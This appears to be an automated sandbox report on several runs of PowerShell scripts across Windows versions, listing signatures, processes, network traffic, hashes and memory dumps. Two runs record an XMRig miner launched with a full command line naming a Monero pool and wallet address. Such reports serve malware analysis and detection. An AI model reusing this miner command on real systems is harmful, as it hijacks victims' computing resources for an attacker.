memory/4316-107-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-108-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-109-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-110-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-111-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-112-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-113-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-114-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-115-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-116-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-117-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-118-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-119-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-120-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-121-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-122-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-123-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-124-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-125-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-126-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-127-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-128-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-129-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-130-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-131-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-132-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-133-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-134-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-135-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-136-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-137-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-138-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-139-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-140-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-141-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-142-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-143-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-144-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-145-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-146-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-147-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-148-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-149-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-150-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-151-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-152-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-153-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-154-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-155-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-156-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-157-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:50

Platform

win11-20240508-en

Max time kernel

1766s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/1056-0-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_he5huove.y1p.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1056-9-0x0000026960040000-0x0000026960062000-memory.dmp

memory/1056-10-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1056-11-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1056-12-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1056-13-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp

memory/1056-14-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:29

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp

Files

memory/4716-0-0x00007FFA49D23000-0x00007FFA49D25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l2ua1ydw.wyj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4716-10-0x0000021B7F4C0000-0x0000021B7F4E2000-memory.dmp

memory/4716-11-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp

memory/4716-12-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp

memory/4716-14-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp

memory/4716-15-0x0000021B7F490000-0x0000021B7F4A2000-memory.dmp

memory/4716-16-0x0000021B7DC50000-0x0000021B7DC5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1356-47-0x0000016FEE310000-0x0000016FEE330000-memory.dmp

memory/1356-48-0x0000016FEE360000-0x0000016FEE380000-memory.dmp

memory/1356-49-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/4716-50-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp

memory/1356-51-0x0000016FEE380000-0x0000016FEE3A0000-memory.dmp

memory/1356-53-0x0000016FEE3A0000-0x0000016FEE3C0000-memory.dmp

memory/4716-52-0x00007FFA49D23000-0x00007FFA49D25000-memory.dmp

memory/1356-54-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/4716-55-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp

memory/1356-56-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-58-0x0000016FEE380000-0x0000016FEE3A0000-memory.dmp

memory/1356-57-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-59-0x0000016FEE3A0000-0x0000016FEE3C0000-memory.dmp

memory/1356-60-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-61-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-62-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-63-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-64-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-65-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-66-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-67-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-68-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-69-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-70-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-71-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-72-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-73-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-74-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-75-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-76-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-77-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-78-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-79-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-80-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-81-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-82-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-83-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-84-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-85-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-86-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-87-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-88-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-89-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-90-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-91-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-92-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-93-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-94-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-95-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-96-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-97-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-98-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-99-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-100-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-101-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-102-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-103-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-104-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-105-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-106-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-107-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-108-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-109-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-110-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-111-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-112-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-113-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-114-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-115-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-116-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-117-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

memory/1356-118-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:30

Platform

win11-20240508-en

Max time kernel

1712s

Max time network

1722s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 52.111.227.11:443 tcp

Files

memory/4836-0-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilqk5kpr.jbl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4836-9-0x0000021D45230000-0x0000021D45252000-memory.dmp

memory/4836-10-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/4836-11-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/4836-12-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/4836-13-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/4836-14-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:41

Platform

win7-20240221-en

Max time kernel

1562s

Max time network

1568s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Network

N/A

Files

memory/2956-4-0x000007FEF5D7E000-0x000007FEF5D7F000-memory.dmp

memory/2956-5-0x000000001B310000-0x000000001B5F2000-memory.dmp

memory/2956-6-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

memory/2956-7-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

memory/2956-8-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

memory/2956-9-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

memory/2956-10-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

memory/2956-11-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

memory/2956-12-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:29

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

memory/4732-5-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp

memory/4732-4-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp

memory/4732-6-0x00000130E5380000-0x00000130E53A2000-memory.dmp

memory/4732-9-0x00000130FDAA0000-0x00000130FDB16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uevzqsoh.brm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4732-24-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp

memory/4732-47-0x00000130FDA80000-0x00000130FDA92000-memory.dmp

memory/4732-60-0x00000130E53B0000-0x00000130E53BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4408-89-0x000002D89AAE0000-0x000002D89AB00000-memory.dmp

memory/4408-90-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-91-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4732-92-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp

memory/4732-93-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp

memory/4408-94-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-95-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-96-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-97-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-98-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-99-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-100-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-101-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-102-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-103-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-104-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-105-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

